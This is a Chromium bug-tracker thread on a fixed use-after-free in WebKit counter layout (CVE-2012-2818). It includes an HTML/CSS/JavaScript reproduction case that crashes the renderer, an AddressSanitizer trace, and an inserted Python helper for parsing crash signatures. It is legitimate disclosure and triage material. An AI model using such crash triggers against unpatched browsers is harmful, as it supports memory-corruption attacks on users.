Issue metadata

Status: Fixed
Closed: Dec 2012
OS: All
Pri: 1
Type: Bug-Security

Use-after-free due to issues in counter layout.

Reported by miau...@gmail.com, Mar 29 2012

Issue description


VULNERABILITY DETAILS

use-after-free in WebCore::RenderObject::container

VERSION
Chrome Version: stable, beta, dev

Chromium	19.0.1085.0 (Developer Build 129583)
OS	Linux
WebKit	536.5 (@112458)

Operating System: linux 64bit

REPRODUCTION CASE
<html>
  <head>
    <style>
      #el0 {
        -webkit-animation-name: a;
        -webkit-animation-duration: 1s;
        counter-reset: c;
      }
      #el0::before {
        content: counter(c);
        counter-reset: c;
        width: 1px;
        height: 1px;
        overflow-x: scroll;
        display: block;
      }
      #el0::after {
        counter-reset: c;
        display: table-header-group;
        content: counter(c);
      }
      #el2 {
        counter-reset: c;
      }
      #el3::before {
        content: counter(c);
      }
    </style>
    <script>
      onload = function() {
        el0=document.createElement('div')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElement('div')
        document.body.appendChild(el1)
        el2=document.createElement('div')
        el2.setAttribute('id','el2')
        el1.appendChild(el2)
        el3=document.createElement('div')
        el3.setAttribute('id','el3')
        document.body.appendChild(el3)
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 

==16346== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffeca75098 at pc 0x55555ac88045 bp 0x7fffffff9100 sp 0x7fffffff90f8
READ of size 8 at 0x7fffeca75098 thread T0
    #0 0x55555ac88045 in WebCore::RenderObject::container(WebCore::RenderBoxModelObject*, bool*) const ???:0
    #1 0x55555ac86e99 in WebCore::RenderObject::markContainingBlocksForLayout(bool, WebCore::RenderObject*) ???:0
    #2 0x55555a557d3a in WebCore::FrameView::scheduleRelayout() ???:0

0x7fffeca75098 is located 24 bytes inside of 184-byte region [0x7fffeca75080,0x7fffeca75138)
freed by thread T0 here:
    #0 0x55555de50f32 in free ??:0
    #1 0x55555aca5bc2 in WebCore::RenderObjectChildList::updateBeforeAfterContent(WebCore::RenderObject*, WebCore::PseudoId, WebCore::RenderObject const*) ???:0
    #2 0x55555aa389ec in WebCore::RenderBlock::styleDidChange(WebCore::StyleDifference, WebCore::RenderStyle const*) ???:0



 
Attachments: 24184.txt (9.6 KB), 24184.html (1.1 KB), beta-24184.txt (9.4 KB), stable-24184.txt (9.4 KB)
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecImpacts-Stable SecImpacts-Beta OS-All Mstone-18 Stability-AddressSanitizer SecSeverity-High
Status: Available
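A triage helper, added here as an example and not part of the issue or of Chromium's tooling: it parses the reporter's AddressSanitizer report above (embedded as a constructed copy) into the access stack and the free stack, and derives the four-frame crash state that ClusterFuzz reports later in this thread, which is the signature used to deduplicate the many counter-layout reports merged into this bug. The frame-name stripping and the allocator-frame skip list are assumptions about ClusterFuzz's behaviour, not its code.

```python
import re

# Constructed sample input: a copy of the AddressSanitizer report from the issue description.
ASAN_REPORT = """\
==16346== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffeca75098 at pc 0x55555ac88045 bp 0x7fffffff9100 sp 0x7fffffff90f8
READ of size 8 at 0x7fffeca75098 thread T0
    #0 0x55555ac88045 in WebCore::RenderObject::container(WebCore::RenderBoxModelObject*, bool*) const ???:0
    #1 0x55555ac86e99 in WebCore::RenderObject::markContainingBlocksForLayout(bool, WebCore::RenderObject*) ???:0
    #2 0x55555a557d3a in WebCore::FrameView::scheduleRelayout() ???:0

0x7fffeca75098 is located 24 bytes inside of 184-byte region [0x7fffeca75080,0x7fffeca75138)
freed by thread T0 here:
    #0 0x55555de50f32 in free ??:0
    #1 0x55555aca5bc2 in WebCore::RenderObjectChildList::updateBeforeAfterContent(WebCore::RenderObject*, WebCore::PseudoId, WebCore::RenderObject const*) ???:0
    #2 0x55555aa389ec in WebCore::RenderBlock::styleDidChange(WebCore::StyleDifference, WebCore::RenderStyle const*) ???:0
"""

HEADER_RE = re.compile(r"AddressSanitizer:? ([\w-]+) on address (0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+)")
FRAME_RE = re.compile(r"^\s*#\d+ 0x[0-9a-f]+ in (.+)$")
# Allocator entry points say nothing about where the bug lives; assumed skip list, mirrors the crash state above.
ALLOCATOR = {"free", "malloc", "realloc", "operator new", "operator delete"}

def frame_name(symbol):
    """Strip the parameter list and source location: 'free ??:0' -> 'free'."""
    return symbol.split("(", 1)[0] if "(" in symbol else symbol.split()[0]

def parse_asan_report(text, depth=2):
    """Split the report into access/free/allocation stacks and derive a ClusterFuzz-style
    crash state: the top `depth` non-allocator frames of the access stack, then of the free stack."""
    r = {"bug_type": None, "address": None, "access": None, "size": None,
         "crash_stack": [], "free_stack": [], "alloc_stack": []}
    section = None
    for line in text.splitlines():
        if m := HEADER_RE.search(line):
            r["bug_type"], r["address"] = m.group(1), m.group(2)
        elif m := ACCESS_RE.match(line):
            r["access"], r["size"], section = m.group(1), int(m.group(2)), "crash_stack"
        elif line.startswith("freed by"):
            section = "free_stack"
        elif line.startswith("previously allocated by"):
            section = "alloc_stack"
        elif section and (m := FRAME_RE.match(line)):
            r[section].append(frame_name(m.group(1)))
    top = lambda frames: [f for f in frames if f not in ALLOCATOR][:depth]
    r["crash_state"] = top(r["crash_stack"]) + top(r["free_stack"])
    r["signature"] = f"{r['bug_type']} {r['access']} {r['size']}: " + " / ".join(r["crash_state"])
    return r
```

Two reports whose `signature` matches are candidates for merging, exactly as the later ClusterFuzz comments in this thread do by crash state.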

Comment 2 by kareng@google.com, Mar 30 2012

Labels: -Mstone-18 Mstone-20

Comment 3 by kareng@google.com, Mar 30 2012

Labels: MovedFrom18
Labels: -Mstone-20 -MovedFrom18 Mstone-18
Reverting wrong marking of security bugs by release management.
Summary: Use-after-free due to issues in counter layout.
Cc: lafo...@chromium.org
Weird, dupes are not showing here. Anthony, any idea what is going wrong with the issue tracker w.r.t. security bugs?

1. http://code.google.com/p/chromium/issues/detail?id=121291
2. http://code.google.com/p/chromium/issues/detail?id=121290
3. http://code.google.com/p/chromium/issues/detail?id=115912
4. http://code.google.com/p/chromium/issues/detail?id=120222

Comment 7 by miau...@gmail.com, Apr 1 2012

:(
Cc: miau...@gmail.com
Issue 108958 has been merged into this issue.
@inferno: did we mean to merge the older bug into this newer one?
Cc: -lafo...@chromium.org
We just have to keep all these counter bugs in one master bug. Since all others were duped against this one, I did the same for 108958. We can fix the credits later.
Owner: kenrb@chromium.org
Superstar Ken is looking at this one.
Status: Started
Cc: rniwa@chromium.org
Cc: jchaffraix@chromium.org kenrb@chromium.org infe...@chromium.org
Issue 121128 has been merged into this issue.
Cc: schenney@chromium.org
See http://code.google.com/p/chromium/issues/detail?id=120921 for a long discussion.

I think we are open to security issues with any text element (and maybe others) in a node that gets marked for layout during layout.
Status: Assigned
I can go back to looking at counters after, but I've separated 108958 back out from this and I'm trying to fix that one first.

If anyone is inclined to steal this in the meantime feel free.

Comment 18 by kenrb@chromium.org, Apr 12 2012

Status: Started

Comment 19 by kenrb@chromium.org, Apr 12 2012

Summary: Heap-use-after-free in WebCore::RenderObject::container
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=35921152

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7fcfe384a298
Crash State:
  - crash stack -
  WebCore::RenderObject::container
  WebCore::RenderObject::markContainingBlocksForLayout
  - free stack -
  WebCore::RenderObjectChildList::updateBeforeAfterContent
  WebCore::RenderBlock::styleDidChange

Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv95T-wkB8UtINNejsfb36-TkqpWA9aLh6OfZrsYtvO5B53ynHEVDQhTRdjiYfyjkl9VtdKL3xvZFpNW_93uTJJIS8Qb_oiFTxTJ86TD_V47On1w2Po7OphkoePURwGgHMqu8g7egQ3m8eEuHl_GjiVqYhx8veA
Summary: Use-after-free due to issues in counter layout.
Renaming the bug title since it conflicts with another bug.
Issue 124550 has been merged into this issue.
Issue 126404 has been merged into this issue.
Labels: -Mstone-18 Mstone-19
m19 is out, moving milestone m18 bugs to m19.

Comment 25 by kenrb@chromium.org, May 18 2012

Status: Assigned

Comment 26 by kenrb@chromium.org, May 24 2012

These are the test cases that still repro at this point, aside from the first one that started this bug:
https://cluster-fuzz.appspot.com/testcase?key=30740098 (originally from bug 120222)

https://cluster-fuzz.appspot.com/testcase?key=43502492 (originally from bug 126404)

+ all the test cases from bug 121128, but some of those repros are really hard to look at
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/118452
Labels: -Mstone-19 Mstone-20 reward-topanel
Labels: -Merge-Approved
Status: Assigned
Reopening, needs a minor fix.
Labels: Merge-Approved
Status: FixUnreleased
Use this instead - http://trac.webkit.org/changeset/118542
Cc: dglazkov@chromium.org shinyak@chromium.org dominicc@chromium.org
Issue 119087 has been merged into this issue.

Comment 32 by ClusterFuzz, May 28 2012

ClusterFuzz has detected this issue as fixed in range 139082:139098.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=35921152

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7ff33660da98
Crash State:
  - crash stack -
  WebCore::RenderObject::container
  WebCore::RenderObject::markContainingBlocksForLayout
  - free stack -
  WebCore::RenderObjectChildList::updateBeforeAfterContent
  WebCore::RenderBlock::styleDidChange
Fixed: https://cluster-fuzz.appspot.com/revisions?range=139082:139098

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv94FVj-ykvMa5QK5Gjo3n-OgSYnuNI3WBwius_ToiGfae7XTj-W93xH8UijqoAoU8zNmofoSb8bwWLCCUxm_Z8B5Kfa3JS-4aXQr1TFldPhHJJzDUAXvW2ZEl4p2BLJ0CJdOTnwRcfsflcnmbqkXnF7SDgBMcA

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Merge-Approved Merge-Merged
M20: http://trac.webkit.org/changeset/119621
Labels: -reward-topanel reward-1000 reward-unpaid
$1000
Labels: CVE-2012-2818
Labels: -reward-unpaid

Comment 37 by bugdroid1@chromium.org, Oct 13 2012

Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Status: Fixed

Comment 39 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-WebKit -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer -SecSeverity-High -Mstone-20 Cr-Content M-20 Security-Impact-Stable Security-Impact-Beta Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High

Comment 40 by bugdroid1@chromium.org, Mar 13 2013

Labels: Restrict-View-EditIssue

Comment 41 by bugdroid1@chromium.org, Mar 14 2013

Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue

Comment 43 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High

Comment 44 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 45 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 46 by bugdroid1@chromium.org, Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer

Comment 47 by bugdroid1@chromium.org, Apr 6 2013

Labels: -Cr-Content Cr-Blink

Comment 48 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta

Comment 49 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 50 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted
